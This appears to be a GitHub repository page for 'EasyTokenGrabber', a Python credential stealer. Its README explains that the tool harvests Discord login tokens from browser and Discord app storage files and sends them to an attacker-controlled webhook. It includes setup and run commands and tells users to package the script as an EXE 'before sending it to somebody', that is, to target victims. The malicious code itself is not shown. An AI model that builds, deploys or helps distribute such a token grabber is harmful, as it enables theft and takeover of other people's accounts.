Skip to content

script is designed to extract Discord tokens from storage files across browsers and the Discord desktop app.

License

Notifications You must be signed in to change notification settings

zentonik/EasyTokenGrabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

Discord Token Extractor and Logger

YOU NEED TO MAKE THIS AN EXE FILE BEFORE SENDING IT TO SOMEBODY

Description

This Python script extracts Discord tokens from local storage files across various browsers and the Discord desktop application. It searches for tokens stored in .ldb and .log files and sends any found tokens to a specified Discord webhook for centralized logging or alerting.

Supported Platforms

  • Google Chrome
  • Mozilla Firefox
  • Discord Desktop App
  • Opera GX

Features

  • Multi-Browser Support: Extracts tokens from multiple browsers and the Discord desktop application.
  • File Handling: Searches through .ldb and .log files.
  • Webhook Integration: Sends extracted tokens to a Discord webhook.
  • Error Handling: Reports any issues encountered during token extraction or webhook interaction.

Usage

  1. Update Webhook URL: Replace the placeholder URL in the script with your actual Discord webhook URL.

    webhook_url = 'https://discord.com/api/webhooks/your_webhook_id/your_webhook_token'
  2. Run the Script: Execute the script using Python.

    python main.py

Installation

  1. Clone the Repository:

    git clone https://github.com/zentonik/EasyTokenGrabber.git
    cd EasyTokenGrabber
  2. Install Dependencies:

    Ensure Python is installed, then install the required dependencies:

    pip install requests

About

script is designed to extract Discord tokens from storage files across browsers and the Discord desktop app.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages